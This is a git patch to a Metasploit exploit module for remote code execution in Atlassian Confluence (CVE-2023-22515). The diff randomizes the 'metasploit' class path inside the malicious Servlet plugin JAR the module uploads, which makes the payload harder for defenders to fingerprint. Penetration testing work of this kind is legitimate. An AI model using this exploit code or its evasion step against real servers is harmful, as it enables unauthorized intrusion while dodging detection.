From 5e84f57ab36494f84d1845ba9168d38b064f5765 Mon Sep 17 00:00:00 2001
From: sfewer-r7 <stephen_fewer@rapid7.com>
Date: Wed, 18 Oct 2023 09:53:46 +0100
Subject: [PATCH] set :random to true during generate_jar so we can randomize
 teh metasploit class path

---
 .../multi/http/atlassian_confluence_rce_cve_2023_22515.rb  | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb
index ade045ddf48e..8aa11875dae4 100644
--- a/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb
+++ b/modules/exploits/multi/http/atlassian_confluence_rce_cve_2023_22515.rb
@@ -204,8 +204,9 @@ def exploit
 
       plugin_key = rand_text_alpha(8)
 
-      # 5. Construct a malicious Servlet plugin JAR file.
-      jar = payload.encoded_jar
+      # 5. Construct a malicious Servlet plugin JAR file. We set :random to true which will randomize the string
+      # 'metasploit' in the class paths (via Rex::Zip::Jar::add_sub).
+      jar = payload.encoded_jar(random: true)
 
       jar.add_file(
         'atlassian-plugin.xml',
@@ -215,7 +216,7 @@ def exploit
     <description>#{rand_text_alphanumeric(8)}</description>
     <version>#{rand(1024)}.#{rand(1024)}</version>
   </plugin-info>
-  <servlet key="#{rand_text_alpha(8)}" class="metasploit.PayloadServlet">
+  <servlet key="#{rand_text_alpha(8)}" class="#{jar.substitutions['metasploit']}.PayloadServlet">
     <url-pattern>#{normalize_uri(payload_endpoint)}</url-pattern>
   </servlet>
 </atlassian-plugin>)